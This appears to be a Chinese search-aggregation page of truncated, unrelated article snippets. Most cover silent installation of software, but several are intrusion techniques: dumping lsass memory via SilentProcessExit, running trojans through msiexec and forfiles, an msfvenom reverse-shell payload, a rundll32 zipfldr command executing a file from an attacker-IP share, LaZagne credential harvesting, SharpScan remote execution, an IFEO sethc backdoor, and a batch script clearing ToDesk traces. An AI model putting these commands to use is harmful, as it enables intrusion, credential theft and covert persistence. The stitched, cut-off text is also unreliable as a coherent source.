在GitHub上看到了一个利用SilentProcessExit机制dump内存的项目,于是学习了一下,于是今天来聊一聊利用SilentProcessExit机制dump内存,首先我们知道,在程序崩溃时或者系统崩溃时会产生崩溃后的文件...而这种调试技术,可以派生 werfault.exe进程,可以用来运行任意程序或者也可以用来转存任意进程的内存文件或弹出窗口。若派生新进程的话其进程树如下: ?...而这个时候我们就用到了RtlReportSilentProcessExit这个api,该API将与Windows错误报告服务(WerSvcGroup下的WerSvc)通信,告诉服务该进程正在执行静默退出...然后,WER服务将启动WerFault.exe,该文件将转储现有进程。值得注意的是,调用此API不会导致进程退出。...dump,于是我对代码进行了简单修改,使其可以正常dump,最后的代码已上传至Github。
使用 exe4j 将 Spring Boot 项目打包为 EXE 可执行文件 什么是 exe4j Exe4j 是一款用于将 Java 应用程序打包为 Windows 平台上可执行文件(.exe)的工具。...确认项目已打包为 JAR 文件: 执行以下命令打包 Spring Boot 项目: mvn clean package 在 target 目录下找到生成的 JAR 文件(如 myapp.jar)。...配置项目类型或可执行文件名称 配置操作系统支持 32-bit or 64-bit 默认情况下会生成 32 位 EXE。...如果您的项目使用了 JDK 17 或更高版本,请改用其他工具(如 Launch4j 或 jpackage)。 路径配置: 使用相对路径可以提高可移植性,尤其是在捆绑 JRE 的情况下。...验证 EXE 文件 将生成的 EXE 文件和依赖的 JAR 或捆绑的 JRE 一起复制到目标环境。 双击 EXE 文件,验证是否能正常运行。 在命令行中运行 EXE 文件,检查是否有错误日志输出。
通过txt来执行木马程序 把haha.txt放到某个web目录里 msi=静默安装包 这里我们假设已经入侵成功需要运行某个软件 默认位置: c:/windows/system32/msiexec.exe...这里我们通过将txt文件存入网站中然后在对方电脑中通过msi进行一个静默安装 通过dll执行 msfvenom -p windows/x64/shell/reverse_tcp lhost=[黑客ip].../haha.dll -------------- forfiles执行 forfiles.exe /q c:\windows\system32 /m cmd.exe /c "msiexec /q /i...1、找到计算机,右击打开菜单选择“管理”选项,如下图所示: 2、选择本地用户和组,点击用户,找到“Administrator”帐户,如下图所示: 3、取消勾选“帐户已禁用”,点击确定,如下图所示...查询电脑共享的文件 --------------- zipfldr执行共享程序 rundll32.exe zipfldr.dll,RouteTheCall \\黑客ip\c$\xk.exe
因此,为了方便广大安全研究人员执行渗透测试或信息安全取证任务,LaZagne便应运而生,该工具可以有效查找最常用软件的存储凭证。...该项目基于Python开发,因此支持在Windows或Linux主机中使用。 工具安装 该工具基于Python开发,因此我们首先需要在本地设备上安装并配置好Python环境。...requirements.txt文件来安装该项目所需的其他依赖组件: pip install -r requirements.txt 除此之外,我们也可以直接访问该项目的Releases页面来下载单独的可执行文件...h 使用Verbose模式(两种不同等级): laZagne.exe all -vv 静默模式: laZagne.exe all -quiet -oA 如需解密域凭证,则需要指定用户Windows密码...否则,该工具将尝试所有已找到的Windows密码: laZagne.exe all -password ZapataVive macOS 注意,在macOS系统中,如果没有系统用户的密码,则该工具将很难恢复出存储在
欢迎大家在评论区留言评论自己想了解的工具、方向或职业等互联网相关内容,点赞和推荐多的,波哥会优先安排解答!...主机信息收集:探测当前主机的 .NET 版本、操作系统版本信息,以及已安装的杀毒软件、内网设备(如 AV/EDR/XDR)等。...) SharpScan.exe -h 192.168.244.1.3 -m wmiexec -f cmd -c "ls C:\\Windows" (远程执行命令,通过注册表传递数据) SharpScan.exe...\a.exe (上传文件到远程主机并且执行文件) SharpScan.exe -h 192.168.244.1.3 -m userenum -uf user.txt...(全盘静默检索pass.txt) SharpScan.exe -socks5 8000 -u test -pw 1234 (Socks5:8000,
在此工具的正常功能中,需要在cpu峰值期间生成崩溃转储文件,方便管理员来确定峰值原因,通过以下命令就能直接生成转储文件了。...dump lsass进程 在一个正常的Silent Process Exit机制中,需要进程异常崩溃或者退出,但是对于lsass进程,一但崩溃或者退出,将会导致系统重新启动,因此无法采用正常的windows...在windows中,有个RtlReportSilentProcessExit() API,此api的作用主要是通知windows错误报告服务,哪个进程正在执行静默退出。...如果是句柄,则通过QueryFullProcessImageName来显示出句柄的可执行文件路径,如果是lsass.exe文件,则调用后续的MiniDumpWriteDump来获取lsass内存。...但是打开lsass的ppl后,不但恶意程序无法获取lsass句柄,同时非微软签名的程序也无法获取lsass进程句柄,有可能会影响正常业务。
其实常用的软件和运行库都提供了静默安装参数,但是不同的文件所加的参数并不一致,比如 VS 的环境库 vcredist_x86.exe (这是32位的环境库)后面加 /q 即可完成静默安装,而 NSIS...软件的安装采取全自动或半自动的方式进行。...,只需要在执行文件后加上 /q:a /r:n 参数即可 另种是 Windows 常用的补丁文件,一般情况下加上 /U /N /Z 即可实现静默安装。...如果选了,在批处理文件中的其他命令就会因为计算机重启动而无法执行。...可以使用命令行选项运行wise installation.exe,以自动执行常用任务 更多参数: /c file.wse 从WISE脚本创建可执行文件 /r 在 SetupCapture 窗口中打开WISE
全功能版在双击运行、命令行执行时都会出现UAC弹窗和安装界面,这样非常容易被管理员发现,那么有没有办法能够在命令下实现静默安装呢?...ToDesk文档中看到安装包ToDesk_Setup.exe的/S参数可以实现静默安装,但也会出现UAC弹窗,默认安装在以下目录中,安装完成后自动运行。...0x04 场景2:获取历史连接记录 ToDesk连接一台主机后会在默认安装目录下生成一个json格式文件,在已登录状态和未登录状态的文件命名方式不太一样,但内容基本都差不多。...0x05 可能需要清理的痕迹 这里我们必须要先结束或停止ToDesk_Service进程/服务,否则ToDesk.exe进程会在结束后自动运行。...@echo off taskkill /f /im ToDesk_Lite.exe /im ToDesk_Service.exe /im ToDesk.exe del /s /q C:\Windows\
装机人员应该会用到软件静默安装,可以更方便的来管理和批量装机。 一、如何得到软件的静默安装参数 1....Pack补丁包用 /extract 解压; ACDSee10 /a 解压 不支持自带参数解压的可以用 WinRAR 或 7-ZIP 解压,直接提取安装文件,执行静默安装。...还可以改软件配置文件,执行静默安装 如:Total Commander:用 WinRAR 解压出来,修改 install.inf 中 auto=1 即可自动安装。 6....如果还不行,想办法获取到该软件支持静默安装的版本,或重新打包版本,或用 Au3 的键盘鼠标自动点击安装。...二、常用软件静默参数 个人感觉 InstallShield 封装的执行静默安装不太稳定,有时会莫名的安装失败,也比较占用资源。其它格式的都还可以。
/s 静默解压缩文件。...(无法执行指定的命令行!)错误。 即插即用更新 使用 /e 参数解压档案文件之后,您可以用其进行即插即用更新或安装。...遵照“硬件更新向导”的指导选择已解压的驱动程序。 使用 DxSetup.exe 实用程序 DxSetup.exe 安装英特尔 PRO 网络连接驱动程序和软件。它将自动检测系统语言,并以此语言启动。...DxSetup.exe Public Properties(公共属性) 属性 定义 BD “0”,取消选择/ 不执行 SetupBD。...命令行示例: 以下命令行启动典型的静默安装: DxSetup.exe /qn /liew C:\install.log 如何安装组件但是取消选择 ANS。
说明:新版本的JBuilder可以直接把工程制作成各系统的可执行文件,包括Windows系统。 软件性质:商业软件 下载地址:略。我是从eMule下载的。...面对后两种情况下,通常来说,我们如果想要提取完整的jar包,必须用ODB调程序执行到解密完成调用jar的位置,然后dump内存把所有内容dump下来。...http://reverseengineeringtips.blogspot.com/2014/12/unpacking-jar2exe-21-extracting-jar.html 这个连接天朝境内无法访问...This java archive can be recovered using a hex editor, just like we did with launch4j in the previous...That means that this class belongs in a folder hierarchy of net/sf/launch4j/example.
大家一定都知道映像劫持后门,在以下注册表中的sethc.exe项添加一个Debugger字符值(REG_SZ),并且赋值为cmd.exe的执行路径为C:\windows\system32\cmd.exe...执行sethc.exe程序时会执行cmd.exe程序。...0x03中所讲述的传统“映像劫持”后门是修改IFEO中的“debugger”键值,用来替换原有程序的执行。而不一样的“映像劫持”后门,实现的效果是:程序A静默退出结束后,会执行程序B。...使用Process Explorer进行检测进程的变化发现键入五下Shift执行时,先执行sethc.exe程序,当sethc.exe程序静默退出时,执行cmd.exe程序,运行效果如下: 0x05 来看一看它的原理...三次握手建立连接,因此当我们看到异常请求或连接时可进行防御措施。
去其他软件下载站下载的我总担心有毒 https://github.com/abbodi1406/vcredist 除过MSXXX[][][].dll的报错,我还遇到过由于找不到d3dx*_*.dll,无法继续执行代码的报错...id=35 http://download.microsoft.com/download/1/7/1/1718CCC4-6315-4D8E-9543-8E28A4E18C4C/dxwebsetup.exe...下载directx_Jun2010_redist.exe放到C盘根目录,即下文路径中的c:\directx_Jun2010_redist.exe 离线安装文件在安装时报错率较高,报错的时候使用在线安装版可以一次性成功...,如果机器没网,可以准备好离线文件后使用静默安装方式,这个方式不报错。...cmd命令行静默安装命令: rd /s /q c:\temp\tmp\tmp 2>nul 1>nul mkdir c:\temp\tmp\tmp 2>nul 1>nul del C:\Windows\
如果未选中该选项,并且未选中静默,快照将创建在崩溃后仍保持一致的文件,可用来重新引导虚拟机。 但如果是独立磁盘,则不能创建内存快照,NBU不能对独立磁盘的虚机创建备份。...注意:创建内存快照时,虚拟机完全处于停止状态 静默状态:在生成快照时虚拟机电源已打开,VMware Tools 将让虚拟机中的文件系统处于静默状态。...注意:静默表示暂停或改变在计算机上运行的进程的状态,特别是可能会在备份过程中修改存储在磁盘上的信息的进程,以保证一致的可用备份。内存快照不需要静默,其主要用于备份。...注意:视客户机操作系统而定,静默操作可以通过同步驱动程序、vmsync 模块或 Microsoft 卷影复制服务 (VSS) 完成。...子磁盘会增长得很大,乃至填满整个数据存储,但这是因为包含数据存储的 LUN 不够大,无法容纳基础磁盘、已创建的快照数量、相关开销和已创建的 .vmsn 文件。
⑵ 以下根据你的操作系统: ① Windows : • 运行已经下载的 ideaIC.exe 或者是 ideaIU.exe 文件。...在Windows上执行静默安装 无需任何用户界面即可执行静默安装。网络管理员可以使用它在许多机器上安装IntelliJ IDEA,避免中断其他用户。...要执行静默安装,请使用以下开关运行安装程序: • /S:启用静默安装 • /D:指定安装目录的路径 • /CONFIG:指定静默配置文件的路径 例如: ideaIU.exe /S /CONFIG=d:\...静默配置文件定义了安装IntelliJ IDEA的选项。使用默认选项,仅对当前用户执行静默安装(mode=user)。...默认的静默配置文件对于每个JetBrains产品都是唯一的。您可以根据需要对其进行修改以启用或禁用各种安装选项。 11.
编辑要运行 PhpStorm,请在 Windows开始菜单中找到它或使用桌面快捷方式。您还可以在bin下的安装目录中运行启动器批处理脚本或可执行文件。...Windows 上的静默安装静默安装是在没有任何用户界面的情况下执行的。网络管理员可以使用它在多台机器上安装 PhpStorm 并避免打扰其他用户。...要执行静默安装,请使用以下开关运行安装程序:/S: 启用静默安装/CONFIG: 指定静默配置文件的路径/D: 指定安装目录路径此参数必须是命令行中的最后一个,并且即使路径包含空格,也不应包含任何引号。...使用默认选项,仅对当前用户执行静默安装:mode=user。如果要为所有用户安装 PhpStorm,请将安装模式选项的值更改为mode=admin并以管理员身份运行安装程序。...每个 JetBrains 产品的默认静默配置文件都是唯一的。您可以修改它以根据需要启用或禁用各种安装选项。可以在没有配置文件的情况下执行静默安装。
最后,使用 一个 WScript.Shell对象将1.hta移动到%TEMP%文件夹并以静默方式执行 ,然后宏退出。 ?...最后,如果没有进程名称与bdagent.exe或 PSUAMain.exe匹配,则 for 循环结束,然后执行一个Shell命令(由3个base64编码的字符串组成)。....exe 或 1.hta。...一旦执行了最终的payload,宏的运行也就结束了,只留下6.exe 或 6.pif运行。...l 恶意word文档完全退出,只留下6.exe 或 6.pif运行。
Windows 防火墙规则 | Microsoft Learn 如果出现问题,手动处理的话,可以在 Windows 防火墙的高级设置中,添加入站或出站规则,或者配置 “允许应用或功能通过 Windows...,但是有个问题,在执行时,会打开 CMD 命令行窗口。...netsh advfirewall firewall delete rule name=""" & ruleName & """ " shell.Run command1, 0, True ' 0 表示静默...因为这里是调用安装目录下的文件,所以不能放在 Function un.onUninstSuccess 中处理,因为那时候,文件都已经被删除了,无法被调用。...Section Uninstall Delete "$INSTDIR\uninst.exe" Delete "$INSTDIR\DicomViewer.exe" ExecWait '"wscript.exe
通过执行以下主题中描述的操作在 Windows 计算机上安装 JDK: 下载 JDK 安装程序 运行 JDK 安装程序 静默安装JDK 下载 JDK 安装程序 访问 Java SE 下载 页面并单击...静默安装JDK 无需双击或打开 JDK 安装程序,您可以使用命令行参数执行静默、非交互的 JDK 安装。...使用静默模式安装 JDK 命令: jdk.exe /s 笔记: 符号 jdk 代表下载的安装程序文件基本名称, 如 jdk-17_windows-x64_bin.exe....使用以下命令静默卸载JDK 模式: MsiExec.exe/X{} 例如,要卸载 JDK 15,请运行以下命令: MsiExec.exe /X{E04E5624-3CF1...程序无法在DOS下运行 模式 如果您看到错误消息: This program cannot be run in DOS mode,然后执行以下操作: 打开 MS-DOS shell 或 命令 提示 窗口
/quiet- 程序将不显示任何窗口或提示,进行后台静默修复,修复完成后自动退出。此参数适合需要集成、内嵌、调用本程序时不显示任何窗口的用户使用。...不论之前用户设定的安全级别是高或低,如果命令行中添加此条参数,则此次程序将强制以低安全级别运行程序。此参数适合因高安全级别导致下载失败而无法修复的用户使用。...此功能适用于学术用户,在调用本程序进行学术研究、测试、展示时,显示已授权信息,满足学术要求。...此参数适合因系统软硬件原因而导致无法兼容新版参数的用户使用。 18、授权信息参数 参数:NeedforCopyright=XXX 参数解释:XXX可替换为要授权的人或组织,最多支持15个字符。...此参数适用于学术用户,在调用本程序进行学术研究、测试、展示时,显示已授权信息,满足学术要求。效果截图可参见命令行参数9。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
即时通信 IM
云直播
实时音视频
